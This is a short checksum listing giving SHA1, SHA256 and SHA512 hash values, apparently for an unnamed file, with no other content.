SHA13a34034fecb2750f73f33b2eef3830b2aa664c25
SHA256368b7cb58d121067a350444bc2298fc16de3fddd37316b03024f6d532d397a20
SHA512dcf05a42f61497a7828b5a9def7580ff0f900f9daf388492020836da7f40ad4b97ba64815aa5d424ab1160f307267b51d0468ef3e482e2c7a7e04f3f3ab43a84